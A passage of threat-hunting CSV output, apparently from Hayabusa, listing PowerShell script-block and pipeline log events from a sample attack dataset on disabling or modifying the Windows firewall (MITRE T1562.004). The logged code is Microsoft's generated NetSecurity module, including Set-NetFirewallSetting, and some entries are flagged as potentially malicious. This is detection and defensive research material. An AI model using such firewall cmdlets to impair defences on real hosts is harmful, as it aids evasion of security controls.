[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance] 
${AssociatedNetIPsecMainModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeSA') -and (@('ByAssociatedNetIPsecMainModeSA') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeSA}, 'MSFT_NetSAAssociation', 'Antecedent', 'Dependent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecQuickModeSA' -Alias '*' function Remove-NetIPsecQuickModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, 
$true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeSA') -and (@('ByAssociatedNetIPsecMainModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeSA}, 'MSFT_NetSAAssociation', 'Antecedent', 'Dependent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByAssociatedNetIPsecMainModeSA', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecQuickModeSA' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense 
Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.500 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.500 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.501 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecQuickModeSA"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.501 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecQuickModeSA"" 
ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.531 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetSecuritySettingData' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallSetting { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetSecuritySettingData')] param( [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, 
[Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if 
(-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallSetting' -Alias '*' function Set-NetFirewallSetting { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetSecuritySettingData')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetSecuritySettingData')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption] ${Exemptions}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStatefulFtp}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStatefulPptp}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachineTransportAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachineTunnelAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] 
[string] ${RemoteUserTransportAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUserTunnelAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${RequireFullAuthSupport}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck] ${CertValidationLevel}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT] ${AllowIPsecThroughNAT}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxSAIdleTimeSeconds}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding] ${KeyEncoding}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing] ${EnablePacketQueuing}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() 
$__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Exemptions')) { [object]$__cmdletization_value = ${Exemptions} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Exemptions'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter 
= [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Exemptions'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStatefulFtp')) { [object]$__cmdletization_value = ${EnableStatefulFtp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulFtp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulFtp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStatefulPptp')) { [object]$__cmdletization_value = ${EnableStatefulPptp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulPptp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulPptp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; 
Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$_",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.531 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetSecuritySettingData' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallSetting { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] 
[OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetSecuritySettingData')] param( [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallSetting' -Alias '*' function Set-NetFirewallSetting { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetSecuritySettingData')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetSecuritySettingData')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption] ${Exemptions}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStatefulFtp}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStatefulPptp}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachineTransportAuthorizationList}, 
[Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachineTunnelAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUserTransportAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUserTunnelAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${RequireFullAuthSupport}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck] ${CertValidationLevel}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT] ${AllowIPsecThroughNAT}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxSAIdleTimeSeconds}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding] ${KeyEncoding}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing] ${EnablePacketQueuing}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, 